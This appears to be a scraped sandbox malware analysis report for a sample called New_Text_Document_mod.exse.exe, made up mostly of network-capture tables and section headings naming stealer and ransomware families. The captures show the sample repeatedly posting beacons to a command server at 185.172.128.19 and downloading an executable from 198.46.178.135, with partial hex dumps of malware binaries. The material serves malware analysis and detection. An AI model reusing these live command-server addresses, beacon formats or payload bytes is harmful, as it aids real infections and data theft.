Dec 20, 2023 15:35:04.808234930 CET	1286	IN	Data Raw: 6f 2f 00 00 0a 00 02 7b 11 00 00 04 72 ab 02 00 70 6f 30 00 00 0a 00 02 7b 11 00 00 04 02 fe 06 10 00 00 06 73 31 00 00 0a 6f 32 00 00 0a 00 02 7b 12 00 00 04 1f 14 1f 14 73 2e 00 00 0a 6f 33 00 00 0a 00 02 7b 12 00 00 04 6f 34 00 00 0a 1c 8d 46 Data Ascii: o/{rpo0{s1o2{s.o3{o4F%{%{%{%{%{%{o,{s5o6{rpo7{ s.o8{o9{rpo:"A"
Dec 20, 2023 15:35:04.808260918 CET	1286	IN	Data Raw: 00 02 7b 17 00 00 04 1f 66 1f 18 73 35 00 00 0a 6f 36 00 00 0a 00 02 7b 17 00 00 04 18 18 18 18 73 57 00 00 0a 6f 58 00 00 0a 00 02 7b 17 00 00 04 72 25 04 00 70 6f 37 00 00 0a 00 02 7b 17 00 00 04 1f 5c 1f 18 73 2e 00 00 0a 6f 38 00 00 0a 00 02 Data Ascii: {fs5o6{sWoX{r%po7{\s.o8{o9{sZo[{rp",AsUoV{ s5o6{sWoX{rApo7{Js.o8{o9
Dec 20, 2023 15:35:05.051605940 CET	1286	IN	Data Raw: 70 6f 67 00 00 0a 00 02 7b 25 00 00 04 1f 10 6f 69 00 00 0a 00 02 7b 25 00 00 04 72 c3 05 00 70 6f 64 00 00 0a 00 02 7b 25 00 00 04 72 d3 05 00 70 6f 65 00 00 0a 00 02 7b 25 00 00 04 1c 6f 66 00 00 0a 00 02 7b 25 00 00 04 72 c3 05 00 70 6f 67 00 Data Ascii: pog{%oi{%rpod{%rpoe{%of{%rpog{&oi{&rpod{&rpoe{&of{&rpog{'oi{'rpod{'rpoe{'of{'rpog{
Dec 20, 2023 15:35:05.051624060 CET	1286	IN	Data Raw: 00 02 28 41 00 00 0a 02 7b 19 00 00 04 6f 42 00 00 0a 00 02 28 41 00 00 0a 02 7b 15 00 00 04 6f 42 00 00 0a 00 02 18 18 18 18 73 57 00 00 0a 28 6f 00 00 0a 00 02 72 3d 07 00 70 28 37 00 00 0a 00 02 72 57 07 00 70 6f 3a 00 00 0a 00 02 02 fe 06 16 Data Ascii: (A{oB(A{oBsW(or=p(7rWpo:s1(p{oq{oG{oH(G(H}/(!(,{<oI{+"}+{,"},{-"}-{.
Dec 20, 2023 15:35:05.051758051 CET	1286	IN	Data Raw: 73 2e 00 00 0a 6f 38 00 00 0a 00 02 7b 35 00 00 04 1c 6f 39 00 00 0a 00 02 7b 35 00 00 04 72 b9 08 00 70 6f 3a 00 00 0a 00 02 7b 36 00 00 04 20 eb 00 00 00 20 57 01 00 00 73 35 00 00 0a 6f 36 00 00 0a 00 02 7b 36 00 00 04 18 73 7c 00 00 0a 6f 58 Data Ascii: s.o8{5o9{5rpo:{6 Ws5o6{6s\|oX{6rpo7{6]s.o8{6o9{6rpo:{6o\{6*s1o]{7 Vs5o6{7s\|oX{7r
Dec 20, 2023 15:35:05.051862001 CET	1286	IN	Data Raw: 30 07 00 50 01 00 00 08 00 00 11 00 73 1f 00 00 06 0a 06 6f 22 00 00 0a 17 fe 01 16 fe 01 0d 09 2c 06 00 38 32 01 00 00 06 6f 20 00 00 06 28 89 00 00 0a 2d 27 06 6f 22 00 00 06 28 89 00 00 0a 2d 1a 06 6f 26 00 00 06 28 89 00 00 0a 2d 0d 06 6f 24 Data Ascii: 0Pso",82o (-'o"(-o&(-o$(+,rp(v&8o&(,"2" A+,rQprp(&8o (.,}{Ho%rp{Hoo
Dec 20, 2023 15:35:05.051934958 CET	1286	IN	Data Raw: 14 72 58 e1 03 70 17 8d 10 00 00 01 25 16 07 28 36 00 00 06 a2 14 14 28 9f 00 00 0a 74 31 00 00 01 0c 08 72 62 e1 03 70 6f a0 00 00 0a 0d 7e 3d 00 00 04 17 8d 70 00 00 01 25 16 1f 5f 9d 6f a1 00 00 0a 13 04 16 13 05 11 05 16 fe 01 13 13 11 13 2c Data Ascii: rXp%(6(t1rbpo~=p%_o,+%,+,+%,+ , + ,X+,+%,+
Dec 20, 2023 15:35:05.052032948 CET	1286	IN	Data Raw: 00 02 7b 48 00 00 04 18 6f 5e 00 00 0a 00 02 7b 48 00 00 04 6f 5f 00 00 0a 1b 8d 5e 00 00 01 25 16 02 7b 49 00 00 04 a2 25 17 02 7b 4a 00 00 04 a2 25 18 02 7b 4b 00 00 04 a2 25 19 02 7b 4c 00 00 04 a2 25 1a 02 7b 4d 00 00 04 a2 6f 60 00 00 0a 00 Data Ascii: {Ho^{Ho_^%{I%{J%{K%{L%{Mo`{Ho{HAs5o6{Hs\|oX{Hr6po7{Ho{HRoa{Hob!oc{H s.o8{Ho9{Ir
Dec 20, 2023 15:35:05.052273989 CET	1286	IN	Data Raw: 01 00 00 04 73 18 00 00 0a 0a 73 1e 00 00 0a 0b 06 07 6f 1f 00 00 0a 26 04 07 6f b8 00 00 0a 00 04 05 6f b9 00 00 0a 00 2a 13 30 02 00 99 01 00 00 03 00 00 11 00 28 01 00 00 06 00 72 16 e5 03 70 0a 02 06 28 03 00 00 06 7d 52 00 00 04 02 7b 58 00 Data Ascii: sso&oo*0(rp(}R{X{Ro{Xo_orpoe{Xo_or)poe{Xo_orEpoe{Xo_or[poe{Xo_orqpoe{Xo

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:04.945993900 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:05.238325119 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:05.239778042 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:05.532291889 CET	324	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 36 0d 0a 3c 63 3e 31 30 30 30 30 38 33 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 38 35 30 65 38 61 35 65 34 38 32 64 61 38 64 63 64 32 63 35 61 30 62 33 65 62 32 30 34 62 32 35 36 31 39 66 36 31 30 30 37 63 39 62 38 39 39 62 37 36 35 33 64 39 62 34 32 31 32 66 63 37 64 33 66 64 66 63 34 65 61 30 35 63 36 37 66 63 34 62 39 61 33 33 35 31 34 66 63 39 66 64 34 33 61 62 39 31 61 61 61 62 62 65 38 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 86<c>1000083001+++a6d3917b850e8a5e482da8dcd2c5a0b3eb204b25619f61007c9b899b7653d9b4212fc7d3fdfc4ea05c67fc4b9a33514fc9fd43ab91aaabbe89#<d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:07.059859991 CET	80	OUT	GET /2545/wlanext.exe HTTP/1.1 Host: 198.46.178.135 Connection: Keep-Alive
Dec 20, 2023 15:35:07.236192942 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 20 Dec 2023 14:35:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 18 Dec 2023 16:41:12 GMT ETag: "d8e40-60ccb6afaee88" Accept-Ranges: bytes Content-Length: 888384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b1 28 81 e9 d0 46 d2 e9 d0 46 d2 e9 d0 46 d2 2a df 19 d2 eb d0 46 d2 e9 d0 47 d2 76 d0 46 d2 2a df 1b d2 e6 d0 46 d2 bd f3 76 d2 e3 d0 46 d2 2e d6 40 d2 e8 d0 46 d2 52 69 63 68 e9 d0 46 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 35 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 d0 01 00 00 04 00 00 bf 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 04 00 00 56 7c 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 74 00 00 a0 00 00 00 00 50 03 00 00 46 00 00 00 00 00 00 00 00 00 00 08 6c 0d 00 38 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 59 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 46 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a8 01 00 00 90 00 00 00 04 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 01 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 46 00 00 00 50 03 00 00 46 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(FFFFGvFFvF.@FRichFPEL5MX`2p@V\|@(tPFl8"p.textY^` `.rdataFpd@@.datax@.ndata@.rsrcFPF\|@@
Dec 20, 2023 15:35:07.236217976 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c Data Ascii: U\}t+}FEuH(7BHPuuur@BSV507BEWPur@eEEPur@}e\p@FRVVU+MM3FQNUMVTU
Dec 20, 2023 15:35:07.236310005 CET	1286	IN	Data Raw: ff ff e9 9f 14 00 00 53 50 e8 3f 3c 00 00 e9 88 14 00 00 53 e8 d0 15 00 00 83 f8 01 59 89 55 c8 7f 03 33 c0 40 50 ff 15 74 70 40 00 e9 6a 14 00 00 ff 75 f8 ff 15 4c 72 40 00 e9 5c 14 00 00 c1 e0 02 39 5d e0 75 26 8b 88 a0 37 42 00 6a 01 89 88 e0 Data Ascii: SP?<SYU3@Ptp@juLr@\9]u&7Bj7BYUM7B.7B7BE47B3;#MD47BV.B5xr@;tRQE/B;PQj*uPp@
Dec 20, 2023 15:35:07.236393929 CET	1286	IN	Data Raw: 56 e8 3e 45 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 04 00 00 0f 8d 79 0f 00 00 88 1c 30 e9 71 0f 00 00 6a 20 e8 da 10 00 00 6a 31 8b f0 e8 d1 10 00 00 39 5d e8 50 56 75 12 ff 15 0c 71 40 00 85 c0 75 78 8b 45 e0 e9 53 0f 00 00 ff 15 14 71 40 Data Ascii: V>EEy]E=y0qj j19]PVuq@uxESq@3GWhVPEq@t9]tVuq@u}SHjU<9]YYUu;\|~;sEzEjjU}YUYE
Dec 20, 2023 15:35:07.236475945 CET	1286	IN	Data Raw: 84 55 08 00 00 39 5d e0 74 46 8b 35 5c 71 40 00 eb 07 6a 0f e8 e4 43 00 00 6a 64 ff 75 08 ff d6 3d 02 01 00 00 74 eb 8d 45 f4 50 ff 75 08 ff 15 58 71 40 00 39 5d dc 7c 0b ff 75 f4 57 e8 44 3f 00 00 eb 0c 39 5d f4 74 07 c7 45 fc 01 00 00 00 ff 75 Data Ascii: U9]tF5\q@jCjdu=tEPuXq@9]\|uWD?9]tEup@1jPB;EtsW?sjjMEQPjC;EEPj@`q@;EjBjEBuEuSuU
Dec 20, 2023 15:35:07.236548901 CET	1286	IN	Data Raw: ea 07 00 00 8b 75 e8 8b f8 8b 45 ec 6a 02 89 45 c8 e8 e3 06 00 00 6a 11 89 45 ac e8 d9 06 00 00 8d 4d 08 53 51 8b 0d d0 37 42 00 83 c9 02 53 51 53 53 53 50 57 c7 45 fc 01 00 00 00 ff 15 24 70 40 00 85 c0 0f 85 3f 05 00 00 83 fe 01 bf 00 9c 40 00 Data Ascii: uEjEjEMSQ7BSQSSSPWE$p@?@uj#W:@ujiY@VUXuhWSuPWuSuu(p@u]uhKj38;MEQMVQSPW,p@3Au.}t9M
Dec 20, 2023 15:35:07.236627102 CET	1286	IN	Data Raw: 59 89 55 c8 0f 83 44 fe ff ff 39 5d e4 74 23 39 5d e0 74 0f 50 e8 a4 e9 ff ff 53 53 e8 f3 e8 ff ff eb 60 53 e8 de e9 ff ff 50 57 e8 4a 35 00 00 eb 51 39 5d e0 74 12 8b 15 30 37 42 00 8b 4d dc 89 8c 82 94 00 00 00 eb 3a 8b 0d 30 37 42 00 ff b4 81 Data Ascii: YUD9]t#9]tPSS`SPWJ5Q9]t07BM:07BW5%0BS#Qjur@9]tSSuq@E7B3_^[i)@@@@@@@o@@@Y@@A@b@j@@@F@Y@@@2@G@Y
Dec 20, 2023 15:35:07.236670017 CET	1286	IN	Data Raw: 1b c0 25 00 7e 00 00 05 00 02 00 00 3b f0 7c 02 8b f8 57 68 f0 68 41 00 e8 63 04 00 00 85 c0 0f 84 57 01 00 00 39 1d 34 37 42 00 75 7e 6a 1c 8d 45 dc 68 f0 68 41 00 50 e8 07 2d 00 00 8b 45 dc a9 f0 ff ff ff 75 71 81 7d e0 ef be ad de 75 68 81 7d Data Ascii: %~;\|WhhAcW947Bu~jEhhAP-Euq}uh}Instu_}softuV}NulluMEEhA7BE;47B/EuEuDEp;vEuSY;5hA}WhhAuV4E=hA+;j947BY
Dec 20, 2023 15:35:07.236742020 CET	1286	IN	Data Raw: 71 40 00 ff 15 ac 70 40 00 66 3d 06 00 74 11 53 e8 94 2f 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be 98 72 40 00 56 e8 10 2f 00 00 56 ff 15 a8 70 40 00 8d 74 06 01 38 1e 75 eb 55 6a 09 e8 67 2f 00 00 6a 07 e8 60 2f 00 00 a3 24 37 42 00 ff 15 44 70 Data Ascii: q@p@f=tS/;thr@V/Vp@t8uUjg/j`/$7BDp@Sr@7BSD$8h`PShAtq@h@h /B+p@BPUx+STq@=B" 7BuD$"Bt$P%P0r@D$ u@8 t8"D$ u@D$"8/
Dec 20, 2023 15:35:07.236793995 CET	1286	IN	Data Raw: ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff 77 08 ff 15 44 71 40 00 57 ff 15 24 71 40 00 85 f6 75 e8 5f 83 25 f4 ec 41 00 00 5e c3 a1 f4 ec 41 00 eb 0b 8b 48 08 3b 4c 24 04 74 0a 8b 00 85 c0 75 f1 40 c2 04 00 33 c0 eb f9 56 8b 74 24 08 56 e8 d7 ff ff Data Ascii: tW6wDq@W$q@u_%A^AH;L$tu@3Vt$Vu@,jj@`q@tL$pHAA3^SUV507BWj*3;tPhB%T0ASWSh<s@hB0BxB%80AuSWhZs@hs
Dec 20, 2023 15:35:07.407088041 CET	1286	IN	Data Raw: eb 1d 6a 02 5f 3b f7 75 34 39 2d ac 37 42 00 74 15 57 e8 01 d7 ff ff 89 3d 00 f1 41 00 6a 78 e8 9e 03 00 00 eb 30 6a 03 e8 eb d6 ff ff 85 c0 75 25 c7 05 00 f1 41 00 01 00 00 00 eb e0 ff 74 24 30 ff 74 24 30 68 11 01 00 00 ff 35 f8 2e 42 00 ff 15 Data Ascii: j_;u49-7BtW=Ajx0ju%At$0t$0h5.Br@t$0t$0SOD$,\|$$;AuM5Dr@jW=(7BjW,AjjWAE5/BjWq@j^.B3@A@35@7B;\|>u1Uvt$jU

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:09.942090988 CET	184	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000083001&unit=246122658369
Dec 20, 2023 15:35:10.241458893 CET	192	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 0d 0a 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 3<c>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:10.669886112 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:10.992142916 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:11.064028025 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:11.366727114 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New_Text_Document_mod.exse.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Creal Stealer

Threatname: Djvu

Threatname: Amadey

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CGDHIEGCFHCGDGCAECBGIDAEGI

C:\ProgramData\ECFHJKEB

C:\ProgramData\GCAFCAFHJJDBFIECFBKE

C:\ProgramData\GIIDBGDA

C:\ProgramData\HCFCAAEB

C:\ProgramData\JDHCBAEH

Windows Analysis Report
New_Text_Document_mod.exse.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:13.622417927 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:13.920696020 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:13.928030968 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:14.252110004 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:14.726607084 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:15.022001982 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:15.037750959 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:15.335366011 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:15.810292006 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:16.112927914 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:16.113744020 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
